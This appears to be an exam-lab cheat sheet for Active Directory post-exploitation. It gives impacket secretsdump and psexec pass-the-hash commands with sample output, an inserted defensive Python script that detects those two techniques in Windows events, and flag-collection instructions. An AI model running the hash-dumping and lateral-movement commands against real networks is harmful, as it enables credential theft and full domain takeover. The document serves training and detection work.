POST-EXPLOITATION (AFTER DA)
Dump all hashes
Every account hash in domain — Complete compromise
impacket-secretsdump <domain>/Administrator@<DC_IP> -hashes :<hash>
Example Output
impacket-secretsdump corp.local/Administrator@10.10.10.5 -hashes :31d6cfe...
Administrator:500:aad3b...:31d6cfe...
krbtgt:502:aad3b...:f3bc61...
john.smith:1001:aad3b...:8846f7...
(1247 accounts dumped - full domain compromise)
Access any machine
SYSTEM on any domain machine — Prove impact for report
impacket-psexec <domain>/Administrator@<target> -hashes :<hash>
Example Output
impacket-psexec corp.local/Administrator@10.10.10.20 -hashes :31d6cfe...
C:\Windows\system32> whoami
nt authority\system
(SYSTEM on any machine in the domain)
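Added example, not part of the original cheat sheet: what the two steps above look like from the defender's side, as a Python triage over constructed Windows events. It assumes directory-service access auditing is enabled so domain controllers log event 4662, that service installs are logged as event 7045, and that events arrive already parsed into dicts with the hypothetical field names used here.

```python
import re

# Control-access-right GUIDs for directory replication (DS-Replication-Get-Changes
# and DS-Replication-Get-Changes-All), as they appear in event 4662 "Properties".
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
}
# A service binary sitting directly in the Windows root, which is where a file
# copied over the ADMIN$ share lands (heuristic; tune for your environment).
ADMIN_SHARE_BIN = re.compile(r"^(%systemroot%|c:\\windows)\\[^\\]+\.exe$", re.I)

# Constructed sample events (hypothetical field names); not real log data.
EVENTS = [
    {"id": 4662, "host": "DC01", "user": "DC02$",
     "props": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "host": "DC01", "user": "Administrator",
     "props": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 7045, "host": "WS20", "service": "BTOB",
     "image": r"%systemroot%\kQzYpLmN.exe"},
    {"id": 7045, "host": "WS20", "service": "Spooler2",
     "image": r"C:\Windows\System32\spoolsv.exe"},
]

def triage(events):
    """Return (host, rule, detail) tuples for events matching either rule."""
    alerts = []
    for ev in events:
        if ev["id"] == 4662:
            guids = set(re.findall(r"[0-9a-f-]{36}", ev.get("props", "").lower()))
            # Domain controllers replicate as machine accounts (name ends in "$");
            # a replication request from any other account is suspect.
            if guids & REPL_GUIDS and not ev["user"].endswith("$"):
                alerts.append((ev["host"], "replication-by-non-machine-account", ev["user"]))
        elif ev["id"] == 7045:
            # New service whose binary sits directly in the Windows root.
            if ADMIN_SHARE_BIN.match(ev.get("image", "").strip('"')):
                alerts.append((ev["host"], "service-binary-in-windows-root", ev["image"]))
    return alerts

if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert)
```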
Flag collection
Exam flag files — Screenshot with whoami & ipconfig
type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\<user>\Desktop\local.txt
Example Output
type C:\Users\Administrator\Desktop\proof.txt
<flag_hash_here>
SCREENSHOT MUST INCLUDE:
- The flag content
- whoami output
- ipconfig output
- All in same terminal window